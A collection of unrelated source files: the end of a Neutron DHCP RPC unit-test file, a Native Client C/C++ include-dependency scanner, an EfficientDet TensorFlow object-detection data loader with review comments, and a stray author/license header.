        sorted_subnet_retval = [dict(id='a'), dict(id='b'), dict(id='c')]
    else:
        sorted_subnet_retval = [dict(id='a', segment_id='1'),
                                dict(id='c', segment_id='1')]
    self.assertEqual(retval['subnets'], sorted_subnet_retval)
    self.assertEqual(retval['ports'], port_retval)
def test_get_network_info(self):
    # Plain network, no segments plugin involved.
    self._test_get_network_info()
def test_get_network_info_with_routed_network(self):
    # Segments plugin present and subnets carry segment ids.
    self.get_service_plugins.return_value = {
        'segments': self.segment_plugin
    }
    self._test_get_network_info(segmented_network=True,
                                routed_network=True)
def test_get_network_info_with_segmented_network_but_not_routed(self):
    """Segments exist but the network is not routed; plain subnet sort."""
    self.get_service_plugins.return_value = {
        'segments': self.segment_plugin
    }
    self._test_get_network_info(segmented_network=True)
def test_get_network_info_with_non_segmented_network(self):
    """Segment plugin loaded but the network itself has no segments."""
    self.get_service_plugins.return_value = {
        'segments': self.segment_plugin
    }
    self._test_get_network_info()
def test_update_dhcp_port_verify_port_action_port_dict(self):
    """update_dhcp_port must bind the host into the port dict before the
    port action hook runs."""
    port = {'port': {'network_id': 'foo_network_id',
                     'device_owner': constants.DEVICE_OWNER_DHCP,
                     'fixed_ips': [{'subnet_id': 'foo_subnet_id'}]}
            }
    # Same dict, plus the host binding and the port id.
    expected_port = {'port': {'network_id': 'foo_network_id',
                              'device_owner': constants.DEVICE_OWNER_DHCP,
                              portbindings.HOST_ID: 'foo_host',
                              'fixed_ips': [{'subnet_id': 'foo_subnet_id'}]
                              },
                     'id': 'foo_port_id'
                     }

    def _fake_port_action(plugin, context, port, action):
        # Assert inside the hook: the port dict was augmented in place.
        self.assertEqual(expected_port, port)

    self.plugin.get_port.return_value = {
        'device_id': n_const.DEVICE_ID_RESERVED_DHCP_PORT}
    self.callbacks._port_action = _fake_port_action
    self.callbacks.update_dhcp_port(mock.Mock(),
                                    host='foo_host',
                                    port_id='foo_port_id',
                                    port=port)
def test_update_reserved_dhcp_port(self):
    """Reserved DHCP port updates succeed only for the owning agent."""
    port = {'port': {'network_id': 'foo_network_id',
                     'device_owner': constants.DEVICE_OWNER_DHCP,
                     'fixed_ips': [{'subnet_id': 'foo_subnet_id'}]}
            }
    expected_port = {'port': {'network_id': 'foo_network_id',
                              'device_owner': constants.DEVICE_OWNER_DHCP,
                              portbindings.HOST_ID: 'foo_host',
                              'fixed_ips': [{'subnet_id': 'foo_subnet_id'}]
                              },
                     'id': 'foo_port_id'
                     }

    def _fake_port_action(plugin, context, port, action):
        self.assertEqual(expected_port, port)

    # Port owned by this host's agent: update is allowed.
    self.plugin.get_port.return_value = {
        'device_id': utils.get_dhcp_agent_device_id('foo_network_id',
                                                    'foo_host')}
    self.callbacks._port_action = _fake_port_action
    self.callbacks.update_dhcp_port(
        mock.Mock(), host='foo_host', port_id='foo_port_id', port=port)

    # Port owned by a different device: the update must be rejected.
    self.plugin.get_port.return_value = {
        'device_id': 'other_id'}
    self.assertRaises(exceptions.DhcpPortInUse,
                      self.callbacks.update_dhcp_port,
                      mock.Mock(),
                      host='foo_host',
                      port_id='foo_port_id',
                      port=port)
def test_update_dhcp_port(self):
    """update_dhcp_port forwards the host-bound port dict to update_port."""
    port = {'port': {'network_id': 'foo_network_id',
                     'device_owner': constants.DEVICE_OWNER_DHCP,
                     'fixed_ips': [{'subnet_id': 'foo_subnet_id'}]}
            }
    expected_port = {'port': {'network_id': 'foo_network_id',
                              'device_owner': constants.DEVICE_OWNER_DHCP,
                              portbindings.HOST_ID: 'foo_host',
                              'fixed_ips': [{'subnet_id': 'foo_subnet_id'}]
                              },
                     'id': 'foo_port_id'
                     }
    self.plugin.get_port.return_value = {
        'device_id': n_const.DEVICE_ID_RESERVED_DHCP_PORT}
    self.callbacks.update_dhcp_port(mock.Mock(),
                                    host='foo_host',
                                    port_id='foo_port_id',
                                    port=port)
    self.plugin.assert_has_calls([
        mock.call.update_port(mock.ANY, 'foo_port_id', expected_port)])
def test_release_dhcp_port(self):
    """release_dhcp_port deletes every port owned by the device."""
    existing_port = dict(id='port_id', fixed_ips=[dict(subnet_id='a')])
    self.plugin.get_ports.return_value = [existing_port]
    self.callbacks.release_dhcp_port(
        mock.ANY, network_id='netid', device_id='devid')
    expected = mock.call.delete_ports_by_device_id(mock.ANY, 'devid', 'netid')
    self.plugin.assert_has_calls([expected])
def test_dhcp_ready_on_ports(self):
    """dhcp_ready_on_ports completes one provisioning block per port."""
    ctx = mock.Mock()
    ids = range(10)
    with mock.patch.object(provisioning_blocks,
                           'provisioning_complete') as complete:
        self.callbacks.dhcp_ready_on_ports(ctx, ids)
        expected = [mock.call(ctx, pid, resources.PORT,
                              provisioning_blocks.DHCP_ENTITY)
                    for pid in ids]
        complete.assert_has_calls(expected)
| |
#!/usr/bin/python
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import re
import sys
"""Header Scanner.
This module will scan a set of input sources for include dependencies. Use
the command-line switch -Ixxxx to add include paths. All filenames and paths
are expected and returned with POSIX separators.
"""
# Global verbosity flag, flipped on by the -D command-line switch.
debug = False


def DebugPrint(txt):
  """Print *txt* when the module-level `debug` flag is set.

  Uses the parenthesized print form so the module runs under both
  Python 2 and Python 3 (the original bare `print txt` statement is a
  syntax error on Python 3).
  """
  if debug:
    print(txt)
class PathConverter(object):
  """Convert between POSIX-style and native path representations.

  Every public argument and return value uses '/' separators; only the
  two conversion helpers ever touch the native separator.
  """

  def ToNativePath(self, pathname):
    return pathname.replace('/', os.path.sep)

  def ToPosixPath(self, pathname):
    return pathname.replace(os.path.sep, '/')

  def isfile(self, pathname):
    return os.path.isfile(self.ToNativePath(pathname))

  def getcwd(self):
    return self.ToPosixPath(os.getcwd())

  def isabs(self, pathname):
    return os.path.isabs(self.ToNativePath(pathname))

  def isdir(self, pathname):
    return os.path.isdir(self.ToNativePath(pathname))

  def open(self, pathname):
    return open(self.ToNativePath(pathname))

  def abspath(self, pathname):
    return self.ToPosixPath(os.path.abspath(self.ToNativePath(pathname)))

  def dirname(self, pathname):
    return self.ToPosixPath(os.path.dirname(self.ToNativePath(pathname)))
# Module-level memo tables shared by every Resolver instance. Safe only
# because the filesystem is assumed static for the duration of one run.
filename_to_relative_cache = {}  # (filepath, basepath) -> relpath
findfile_cache = {}  # (tuple(searchdirs), cwd, file) -> filename/None
pathisfile_cache = {}  # abspath -> boolean, works because fs is static
                       # during a run.
class Resolver(object):
  """Resolver finds and generates relative paths for include files.

  The Resolver object provides a mechanism to find and convert a source or
  include filename into a relative path based on provided search paths. All
  paths use POSIX style separators.
  """

  def __init__(self, pathobj=PathConverter()):
    # NOTE(review): the default PathConverter instance is shared across all
    # Resolvers created with the default -- harmless while PathConverter
    # stays stateless.
    self.search_dirs = []
    self.pathobj = pathobj
    self.cwd = self.pathobj.getcwd()
    self.offs = len(self.cwd)

  def AddOneDirectory(self, pathname):
    """Add an include search path. Returns False if it is not a directory."""
    pathname = self.pathobj.abspath(pathname)
    DebugPrint('Adding DIR: %s' % pathname)
    if pathname not in self.search_dirs:
      if self.pathobj.isdir(pathname):
        self.search_dirs.append(pathname)
      else:
        # We can end up here when using the gyp generator analyzer. To avoid
        # spamming only log if debug enabled.
        DebugPrint('Not a directory: %s\n' % pathname)
        return False
    return True

  def RemoveOneDirectory(self, pathname):
    """Remove an include search path (no-op if absent). Returns True."""
    pathname = self.pathobj.abspath(pathname)
    DebugPrint('Removing DIR: %s' % pathname)
    if pathname in self.search_dirs:
      self.search_dirs.remove(pathname)
    return True

  def AddDirectories(self, pathlist):
    """Add list of space separated directories; False if any add failed."""
    failed = False
    dirlist = ' '.join(pathlist)
    for dirname in dirlist.split(' '):
      if not self.AddOneDirectory(dirname):
        failed = True
    return not failed

  def GetDirectories(self):
    # Current absolute search paths, in insertion order.
    return self.search_dirs

  def RealToRelative(self, filepath, basepath):
    """Returns a relative path from an absolute basepath and filepath."""
    cache_key = (filepath, basepath)
    cache_result = None
    if cache_key in filename_to_relative_cache:
      cache_result = filename_to_relative_cache[cache_key]
      return cache_result

    def SlowRealToRelative(filepath, basepath):
      # Strip the common prefix, then climb out of whatever base remains.
      path_parts = filepath.split('/')
      base_parts = basepath.split('/')
      while path_parts and base_parts and path_parts[0] == base_parts[0]:
        path_parts = path_parts[1:]
        base_parts = base_parts[1:]
      rel_parts = ['..'] * len(base_parts) + path_parts
      rel_path = '/'.join(rel_parts)
      return rel_path

    rel_path = SlowRealToRelative(filepath, basepath)
    filename_to_relative_cache[cache_key] = rel_path
    return rel_path

  def FilenameToRelative(self, filepath):
    """Returns a relative path from CWD to filepath."""
    filepath = self.pathobj.abspath(filepath)
    basepath = self.cwd
    return self.RealToRelative(filepath, basepath)

  def FindFile(self, filename):
    """Search for <filename> across the search directories, if the path is not
    absolute. Return the filepath relative to the CWD or None. """
    # Cache key includes the search path set: results change when it does.
    cache_key = (tuple(self.search_dirs), self.cwd, filename)
    if cache_key in findfile_cache:
      cache_result = findfile_cache[cache_key]
      return cache_result
    result = None

    def isfile(absname):
      # Memoized stat; valid because the fs is static during a run.
      res = pathisfile_cache.get(absname)
      if res is None:
        res = self.pathobj.isfile(absname)
        pathisfile_cache[absname] = res
      return res

    if self.pathobj.isabs(filename):
      if isfile(filename):
        result = self.FilenameToRelative(filename)
    else:
      for pathname in self.search_dirs:
        fullname = '%s/%s' % (pathname, filename)
        if isfile(fullname):
          result = self.FilenameToRelative(fullname)
          break
    findfile_cache[cache_key] = result
    return result
def LoadFile(filename):
  """Return the contents of *filename*, or '' if it cannot be opened.

  Open failures are tolerated (missing files are common when scanning
  speculative include paths); read failures still propagate.
  """
  # Catch cases where the file does not exist
  try:
    fd = PathConverter().open(filename)
  except IOError:
    DebugPrint('Exception on file: %s' % filename)
    return ''
  # Go ahead and throw if you fail to read -- but always close the
  # handle; the original leaked the file descriptor.
  try:
    return fd.read()
  finally:
    fd.close()
# Memo table for Scanner.ScanFile: abs_filename -> include_list. Shared by
# all Scanner instances; valid while source files don't change mid-run.
scan_cache = {}  # cache (abs_filename -> include_list)
class Scanner(object):
  """Scanner searches for '#include' lines to find dependencies."""

  def __init__(self, loader=None):
    # Match both <...> and "..." include forms, anchored per line.
    self.parser = re.compile(
        r'^\s*\#[ \t]*include[ \t]*[<"]([^>"]+)[>"]', re.M)
    self.loader = loader if loader else LoadFile

  def ScanData(self, data):
    """Return the list of include names found in this text block."""
    return self.parser.findall(data)

  def ScanFile(self, filename):
    """Return the includes of *filename*, memoized in scan_cache."""
    key = os.path.abspath(filename)
    cached = scan_cache.get(key)
    if cached is not None:
      return cached
    includes = self.ScanData(self.loader(filename))
    scan_cache[key] = includes
    DebugPrint('Source %s contains:\n\t%s' % (filename, '\n\t'.join(includes)))
    return includes
class WorkQueue(object):
  """Queue of files awaiting an include scan.

  Files are pushed at most once: new items are recorded in `added_set`
  and appended to `todo_list`, which Run() drains. Attempts to push an
  already-seen or unresolvable file are ignored.
  """

  def __init__(self, resolver, scanner=None):
    # Build the default Scanner lazily: the original `scanner=Scanner()`
    # default was evaluated once at class-definition time and shared by
    # every WorkQueue created with the default.
    self.added_set = set()
    self.todo_list = list()
    self.scanner = scanner if scanner is not None else Scanner()
    self.resolver = resolver

  def PushIfNew(self, filename):
    """Add this dependency to the queue if not already there."""
    DebugPrint('Adding %s' % filename)
    resolved_name = self.resolver.FindFile(filename)
    if not resolved_name:
      DebugPrint('Failed to resolve %s' % filename)
      return
    DebugPrint('Resolved as %s' % resolved_name)  # was misspelled 'Resolvd'
    if resolved_name in self.added_set:
      return
    self.todo_list.append(resolved_name)
    self.added_set.add(resolved_name)

  def PopIfAvail(self):
    """Fetch the next dependency to search, or None when drained."""
    if not self.todo_list:
      return None
    return self.todo_list.pop()

  def Run(self):
    """Search through the available dependencies until the list becomes empty.
    The list must be primed with one or more source files to search.

    Returns the set of every resolved, CWD-relative file name seen.
    """
    scan_name = self.PopIfAvail()
    while scan_name:
      includes = self.scanner.ScanFile(scan_name)
      # Add the directory of the current scanned file for resolving includes
      # while processing includes for this file.
      scan_dir = PathConverter().dirname(scan_name)
      # NOTE(review): AddOneDirectory returns True on success, so
      # `added_dir` is True only when the add *failed*; successfully added
      # directories are never removed here and accumulate in the resolver.
      # Behavior preserved as-is -- confirm against upstream before fixing.
      added_dir = not self.resolver.AddOneDirectory(scan_dir)
      for include_file in includes:
        self.PushIfNew(include_file)
      if added_dir:
        self.resolver.RemoveOneDirectory(scan_dir)
      scan_name = self.PopIfAvail()
    return self.added_set
def DoMain(argv):
  """Entry point used by gyp's pymod_do_main feature.

  Understands -I (include dir), -S (source file) and -D (debug) switches
  and returns the sorted, newline-joined set of discovered dependencies.
  """
  global debug
  resolver = Resolver()
  source_files = []
  mode = ''
  for arg in argv:
    if arg in ('-I', '-S'):
      mode = arg
    elif arg == '-D':
      debug = True
    elif mode == '-I':
      # Skip generated include directories. These files may not exist and
      # there should be explicit dependency on the target that generates
      # these files.
      if not arg.startswith('$!PRODUCT_DIR'):
        resolver.AddDirectories([arg])
    elif mode == '-S':
      source_files.append(arg)

  queue = WorkQueue(resolver)
  for name in source_files:
    queue.PushIfNew(name)
  found = queue.Run()

  # If any of the original files requested aren't found, add them anyway.
  # This is so that source files that will be generated are still returned in
  # the program output.
  found = found.union(set(source_files))
  return '\n'.join(sorted(found)) + '\n'
def Main():
  """Command-line entry point: scan argv and print the dependency list."""
  sys.stdout.write(DoMain(sys.argv[1:]))
# Allow running the scanner directly from the command line.
if __name__ == '__main__':
  Main()
| |
# Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Data loader and processing."""
from absl import logging
import tensorflow as tf
import utils
from tf2 import anchors
from object_detection import preprocessor
from object_detection import tf_example_decoder
class InputProcessor:
  """Base class of Input processor."""

  def __init__(self, image, output_size):
    """Initializes a new `InputProcessor`.

    Args:
      image: The input image before processing.
      output_size: The output image size after calling resize_and_crop_image
        function.
    """
    self._image = image
    if isinstance(output_size, int):
      # A single int means a square output.
      self._output_size = (output_size, output_size)
    else:
      self._output_size = output_size
    # Parameters to control rescaling and shifting during preprocessing.
    # Image scale defines scale from original image to scaled image.
    self._image_scale = tf.constant(1.0)
    # The integer height and width of scaled image.
    self._scaled_height = tf.shape(image)[0]
    self._scaled_width = tf.shape(image)[1]
    # The x and y translation offset to crop scaled image to the output size.
    self._crop_offset_y = tf.constant(0)
    self._crop_offset_x = tf.constant(0)

  @property
  def image(self):
    # Current (possibly transformed) image tensor.
    return self._image

  @image.setter
  def image(self, image):
    self._image = image

  def normalize_image(self, mean_rgb, stddev_rgb):
    """Normalize the image to zero mean and unit variance."""
    # The image normalization is identical to Cloud TPU ResNet.
    self._image = tf.cast(self._image, dtype=tf.float32)
    self._image -= tf.constant(mean_rgb, shape=(1, 1, 3), dtype=tf.float32)
    self._image /= tf.constant(stddev_rgb, shape=(1, 1, 3), dtype=tf.float32)
    return self._image

  def set_training_random_scale_factors(self,
                                        scale_min,
                                        scale_max,
                                        target_size=None):
    """Set the parameters for multiscale training.

    Notably, if train and eval use different sizes, then target_size should be
    set as eval size to avoid the discrepancy between train and eval.

    Args:
      scale_min: minimal scale factor.
      scale_max: maximum scale factor.
      target_size: targeted size, usually same as eval. If None, use train
        size.
    """
    if not target_size:
      target_size = self._output_size
    target_size = utils.parse_image_size(target_size)
    logging.info('target_size = %s, output_size = %s', target_size,
                 self._output_size)

    # Select a random scale factor.
    random_scale_factor = tf.random.uniform([], scale_min, scale_max)
    scaled_y = tf.cast(random_scale_factor * target_size[0], tf.int32)
    scaled_x = tf.cast(random_scale_factor * target_size[1], tf.int32)

    # Recompute the accurate scale_factor using rounded scaled image size.
    height = tf.cast(tf.shape(self._image)[0], tf.float32)
    width = tf.cast(tf.shape(self._image)[1], tf.float32)
    image_scale_y = tf.cast(scaled_y, tf.float32) / height
    image_scale_x = tf.cast(scaled_x, tf.float32) / width
    # Keep aspect ratio: take the smaller of the two scales.
    image_scale = tf.minimum(image_scale_x, image_scale_y)

    # Select non-zero random offset (x, y) if scaled image is larger than
    # self._output_size.
    scaled_height = tf.cast(height * image_scale, tf.int32)
    scaled_width = tf.cast(width * image_scale, tf.int32)
    offset_y = tf.cast(scaled_height - self._output_size[0], tf.float32)
    offset_x = tf.cast(scaled_width - self._output_size[1], tf.float32)
    offset_y = tf.maximum(0.0, offset_y) * tf.random.uniform([], 0, 1)
    offset_x = tf.maximum(0.0, offset_x) * tf.random.uniform([], 0, 1)
    offset_y = tf.cast(offset_y, tf.int32)
    offset_x = tf.cast(offset_x, tf.int32)
    self._image_scale = image_scale
    self._scaled_height = scaled_height
    self._scaled_width = scaled_width
    self._crop_offset_x = offset_x
    self._crop_offset_y = offset_y

  def set_scale_factors_to_output_size(self):
    """Set the parameters to resize input image to self._output_size."""
    # Compute the scale_factor using rounded scaled image size.
    height = tf.cast(tf.shape(self._image)[0], tf.float32)
    width = tf.cast(tf.shape(self._image)[1], tf.float32)
    image_scale_y = tf.cast(self._output_size[0], tf.float32) / height
    image_scale_x = tf.cast(self._output_size[1], tf.float32) / width
    image_scale = tf.minimum(image_scale_x, image_scale_y)
    scaled_height = tf.cast(height * image_scale, tf.int32)
    scaled_width = tf.cast(width * image_scale, tf.int32)
    self._image_scale = image_scale
    self._scaled_height = scaled_height
    self._scaled_width = scaled_width

  def resize_and_crop_image(self, method=tf.image.ResizeMethod.BILINEAR):
    """Resize input image and crop it to the self._output dimension."""
    dtype = self._image.dtype
    scaled_image = tf.image.resize(
        self._image, [self._scaled_height, self._scaled_width], method=method)
    # Crop the (possibly oversized) scaled image at the chosen offset...
    scaled_image = scaled_image[self._crop_offset_y:self._crop_offset_y +
                                self._output_size[0],
                                self._crop_offset_x:self._crop_offset_x +
                                self._output_size[1], :]
    # ...then pad an undersized crop up to the fixed output size.
    output_image = tf.image.pad_to_bounding_box(scaled_image, 0, 0,
                                                self._output_size[0],
                                                self._output_size[1])
    self._image = tf.cast(output_image, dtype)
    return self._image
class DetectionInputProcessor(InputProcessor):
  """Input processor for object detection."""

  def __init__(self, image, output_size, boxes=None, classes=None):
    InputProcessor.__init__(self, image, output_size)
    self._boxes = boxes
    self._classes = classes

  def random_horizontal_flip(self):
    """Randomly flip input image and bounding boxes."""
    self._image, self._boxes = preprocessor.random_horizontal_flip(
        self._image, boxes=self._boxes)

  def clip_boxes(self, boxes):
    """Clip boxes to fit in an image."""
    ymin, xmin, ymax, xmax = tf.unstack(boxes, axis=1)
    ymin = tf.clip_by_value(ymin, 0, self._output_size[0] - 1)
    xmin = tf.clip_by_value(xmin, 0, self._output_size[1] - 1)
    ymax = tf.clip_by_value(ymax, 0, self._output_size[0] - 1)
    xmax = tf.clip_by_value(xmax, 0, self._output_size[1] - 1)
    boxes = tf.stack([ymin, xmin, ymax, xmax], axis=1)
    return boxes

  def resize_and_crop_boxes(self):
    """Resize boxes and crop it to the self._output dimension."""
    boxlist = preprocessor.box_list.BoxList(self._boxes)
    # boxlist is in range of [0, 1], so here we pass the scale_height/width
    # instead of just scale.
    boxes = preprocessor.box_list_scale(boxlist, self._scaled_height,
                                        self._scaled_width).get()
    # Adjust box coordinates based on the offset.
    box_offset = tf.stack([
        self._crop_offset_y,
        self._crop_offset_x,
        self._crop_offset_y,
        self._crop_offset_x,
    ])
    boxes -= tf.cast(tf.reshape(box_offset, [1, 4]), tf.float32)
    # Clip the boxes.
    boxes = self.clip_boxes(boxes)
    # Filter out ground truth boxes that are illegal.
    indices = tf.where(
        tf.not_equal((boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]),
                     0))
    boxes = tf.gather_nd(boxes, indices)
    classes = tf.gather_nd(self._classes, indices)
    return boxes, classes

  @property
  def image_scale(self):
    # Return image scale from original image to scaled image.
    return self._image_scale

  @property
  def image_scale_to_original(self):
    # Return image scale from scaled image to original image.
    return 1.0 / self._image_scale

  @property
  def offset_x(self):
    return self._crop_offset_x

  @property
  def offset_y(self):
    return self._crop_offset_y
def pad_to_fixed_size(data, pad_value, output_shape):
  """Pad data to a fixed length at the first dimension.

  Args:
    data: Tensor to be padded to output_shape.
    pad_value: A constant value assigned to the paddings.
    output_shape: The output shape of a 2D tensor.

  Returns:
    The Padded tensor with output_shape [max_instances_per_image, dimension].
  """
  max_instances_per_image, dimension = output_shape
  data = tf.reshape(data, [-1, dimension])
  num_instances = tf.shape(data)[0]
  msg = 'ERROR: please increase config.max_instances_per_image'
  assertion = tf.assert_less(
      num_instances, max_instances_per_image, message=msg)
  with tf.control_dependencies([assertion]):
    pad_length = max_instances_per_image - num_instances
  filler = pad_value * tf.ones([pad_length, dimension])
  return tf.reshape(tf.concat([data, filler], axis=0), output_shape)
class InputReader:
  """Input reader for dataset."""

  def __init__(self,
               file_pattern,
               is_training,
               use_fake_data=False,
               max_instances_per_image=None,
               debug=False):
    # file_pattern: glob pattern matching the input TFRecord files.
    self._file_pattern = file_pattern
    self._is_training = is_training
    self._use_fake_data = use_fake_data
    # COCO has 100 limit, but users may set different values for custom dataset.
    self._max_instances_per_image = max_instances_per_image or 100
    # debug forces deterministic ordering (see dataset_options).
    self._debug = debug

  @tf.autograph.experimental.do_not_convert
  def dataset_parser(self, value, example_decoder, anchor_labeler, params):
    """Parse data to a fixed dimension input image and learning targets.

    Args:
      value: a single serialized tf.Example string.
      example_decoder: TF example decoder.
      anchor_labeler: anchor box labeler.
      params: a dict of extra parameters.

    Returns:
      image: Image tensor that is preprocessed to have normalized value and
        fixed dimension [image_height, image_width, 3]
      cls_targets_dict: ordered dictionary with keys
        [min_level, min_level+1, ..., max_level]. The values are tensor with
        shape [height_l, width_l, num_anchors]. The height_l and width_l
        represent the dimension of class logits at l-th level.
      box_targets_dict: ordered dictionary with keys
        [min_level, min_level+1, ..., max_level]. The values are tensor with
        shape [height_l, width_l, num_anchors * 4]. The height_l and
        width_l represent the dimension of bounding box regression output at
        l-th level.
      num_positives: Number of positive anchors in the image.
      source_id: Source image id. Default value -1 if the source id is empty
        in the groundtruth annotation.
      image_scale: Scale of the processed image to the original image.
      boxes: Groundtruth bounding box annotations. The box is represented in
        [y1, x1, y2, x2] format. The tensor is padded with -1 to the fixed
        dimension [self._max_instances_per_image, 4].
      is_crowds: Groundtruth annotations to indicate if an annotation
        represents a group of instances by value {0, 1}. The tensor is
        padded with 0 to the fixed dimension [self._max_instances_per_image].
      areas: Groundtruth areas annotations. The tensor is padded with -1
        to the fixed dimension [self._max_instances_per_image].
      classes: Groundtruth classes annotations. The tensor is padded with -1
        to the fixed dimension [self._max_instances_per_image].
    """
    with tf.name_scope('parser'):
      data = example_decoder.decode(value)
      source_id = data['source_id']
      image = data['image']
      boxes = data['groundtruth_boxes']
      classes = data['groundtruth_classes']
      classes = tf.reshape(tf.cast(classes, dtype=tf.float32), [-1, 1])
      areas = data['groundtruth_area']
      is_crowds = data['groundtruth_is_crowd']
      image_masks = data.get('groundtruth_instance_masks', [])
      # NOTE(review): duplicate of the cast/reshape a few lines above --
      # redundant but harmless (idempotent on the already-reshaped tensor).
      classes = tf.reshape(tf.cast(classes, dtype=tf.float32), [-1, 1])

      if self._is_training:
        # Training time preprocessing.
        if params['skip_crowd_during_training']:
          indices = tf.where(tf.logical_not(data['groundtruth_is_crowd']))
          classes = tf.gather_nd(classes, indices)
          boxes = tf.gather_nd(boxes, indices)

        if params.get('grid_mask', None):
          from aug import gridmask  # pylint: disable=g-import-not-at-top
          image, boxes = gridmask.gridmask(image, boxes)

        if params.get('autoaugment_policy', None):
          from aug import autoaugment  # pylint: disable=g-import-not-at-top
          if params['autoaugment_policy'] == 'randaug':
            image, boxes = autoaugment.distort_image_with_randaugment(
                image, boxes, num_layers=1, magnitude=15)
          else:
            image, boxes = autoaugment.distort_image_with_autoaugment(
                image, boxes, params['autoaugment_policy'])

      input_processor = DetectionInputProcessor(image, params['image_size'],
                                                boxes, classes)
      input_processor.normalize_image(params['mean_rgb'], params['stddev_rgb'])
      if self._is_training:
        if params['input_rand_hflip']:
          input_processor.random_horizontal_flip()

        input_processor.set_training_random_scale_factors(
            params['jitter_min'], params['jitter_max'],
            params.get('target_size', None))
      else:
        input_processor.set_scale_factors_to_output_size()
      image = input_processor.resize_and_crop_image()
      boxes, classes = input_processor.resize_and_crop_boxes()

      # Assign anchors.
      (cls_targets, box_targets,
       num_positives) = anchor_labeler.label_anchors(boxes, classes)

      # Empty source ids become -1 so they can be parsed as numbers.
      source_id = tf.where(
          tf.equal(source_id, tf.constant('')), '-1', source_id)
      source_id = tf.strings.to_number(source_id)

      # Pad groundtruth data for evaluation.
      image_scale = input_processor.image_scale_to_original
      boxes *= image_scale
      is_crowds = tf.cast(is_crowds, dtype=tf.float32)
      boxes = pad_to_fixed_size(boxes, -1, [self._max_instances_per_image, 4])
      is_crowds = pad_to_fixed_size(is_crowds, 0,
                                    [self._max_instances_per_image, 1])
      areas = pad_to_fixed_size(areas, -1, [self._max_instances_per_image, 1])
      classes = pad_to_fixed_size(classes, -1,
                                  [self._max_instances_per_image, 1])
      if params['scale_range']:
        # Map pixel values from [0, 255] to [-1, 1].
        image = image * 2.0 / 255 - 1.0
      if params['mixed_precision']:
        dtype = tf.keras.mixed_precision.global_policy().compute_dtype
        image = tf.cast(image, dtype=dtype)
        box_targets = tf.nest.map_structure(
            lambda box_target: tf.cast(box_target, dtype=dtype), box_targets)
      return (image, cls_targets, box_targets, num_positives, source_id,
              image_scale, boxes, is_crowds, areas, classes, image_masks)

  @tf.autograph.experimental.do_not_convert
  def process_example(self, params, batch_size, images, cls_targets,
                      box_targets, num_positives, source_ids, image_scales,
                      boxes, is_crowds, areas, classes, image_masks):
    """Processes one batch of data."""
    labels = {}
    # Count num_positives in a batch.
    num_positives_batch = tf.reduce_mean(num_positives)
    labels['mean_num_positives'] = tf.reshape(
        tf.tile(tf.expand_dims(num_positives_batch, 0), [
            batch_size,
        ]), [batch_size, 1])

    if params['data_format'] == 'channels_first':
      images = tf.transpose(images, [0, 3, 1, 2])

    for level in range(params['min_level'], params['max_level'] + 1):
      labels['cls_targets_%d' % level] = cls_targets[level]
      labels['box_targets_%d' % level] = box_targets[level]
      if params['data_format'] == 'channels_first':
        labels['cls_targets_%d' % level] = tf.transpose(
            labels['cls_targets_%d' % level], [0, 3, 1, 2])
        labels['box_targets_%d' % level] = tf.transpose(
            labels['box_targets_%d' % level], [0, 3, 1, 2])
    # Concatenate groundtruth annotations to a tensor.
    groundtruth_data = tf.concat([boxes, is_crowds, areas, classes], axis=2)
    labels['source_ids'] = source_ids
    labels['groundtruth_data'] = groundtruth_data
    labels['image_scales'] = image_scales
    labels['image_masks'] = image_masks
    return images, labels

  @property
  def dataset_options(self):
    # Deterministic ordering only for debugging or evaluation; training
    # trades determinism for throughput.
    options = tf.data.Options()
    options.deterministic = self._debug or not self._is_training
    options.experimental_optimization.map_parallelization = True
    options.experimental_optimization.parallel_batch = True
    return options

  def __call__(self, params, input_context=None, batch_size=None):
    input_anchors = anchors.Anchors(params['min_level'], params['max_level'],
                                    params['num_scales'],
                                    params['aspect_ratios'],
                                    params['anchor_scale'],
                                    params['image_size'])
    anchor_labeler = anchors.AnchorLabeler(input_anchors, params['num_classes'])
    example_decoder = tf_example_decoder.TfExampleDecoder(
        include_mask='segmentation' in params['heads'],
        regenerate_source_id=params['regenerate_source_id']
    )

    batch_size = batch_size or params['batch_size']
    seed = params.get('tf_random_seed', None)
    dataset = tf.data.Dataset.list_files(
        self._file_pattern, shuffle=self._is_training, seed=seed)
    if input_context:
      # Shard across input pipelines for multi-worker training.
      dataset = dataset.shard(input_context.num_input_pipelines,
                              input_context.input_pipeline_id)

    # Prefetch data from files.
    def _prefetch_dataset(filename):
      if params.get('dataset_type', None) == 'sstable':
        # NOTE(review): sstable support is stubbed out; this branch leaves
        # `dataset` unbound and the `return` below would raise -- confirm
        # intent before relying on dataset_type='sstable'.
        pass
      else:
        dataset = tf.data.TFRecordDataset(filename).prefetch(1)
      return dataset

    dataset = dataset.interleave(
        _prefetch_dataset, num_parallel_calls=tf.data.AUTOTUNE,
        deterministic=bool(seed))
    dataset = dataset.with_options(self.dataset_options)
    if self._is_training:
      dataset = dataset.shuffle(64, seed=seed)

    # Parse the fetched records to input tensors for model function.
    # pylint: disable=g-long-lambda
    if params.get('dataset_type', None) == 'sstable':
      map_fn = lambda key, value: self.dataset_parser(value, example_decoder,
                                                      anchor_labeler, params)
    else:
      map_fn = lambda value: self.dataset_parser(value, example_decoder,
                                                 anchor_labeler, params)
    # pylint: enable=g-long-lambda
    dataset = dataset.map(
        map_fn, num_parallel_calls=tf.data.AUTOTUNE)
    dataset = dataset.prefetch(batch_size)
    dataset = dataset.batch(batch_size, drop_remainder=params['drop_remainder'])
    dataset = dataset.map(
        lambda *args: self.process_example(params, batch_size, *args))
    dataset = dataset.prefetch(tf.data.AUTOTUNE)
    if self._is_training:
      dataset = dataset.repeat()
    if self._use_fake_data:
      # Turn this dataset into a semi-fake dataset which always loop at the
      # first batch. This reduces variance in performance and is useful in
      # testing.
      dataset = dataset.take(1).cache().repeat()
    return dataset
| |
# Author: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Denis Engemann <denis.engemann@gmail.com>
# Andrew Dykstra <andrew.r.dykstra@gmail.com>
# Mads Jensen <mje.mads@gmail.com>
#
# License: BSD (3-clause)
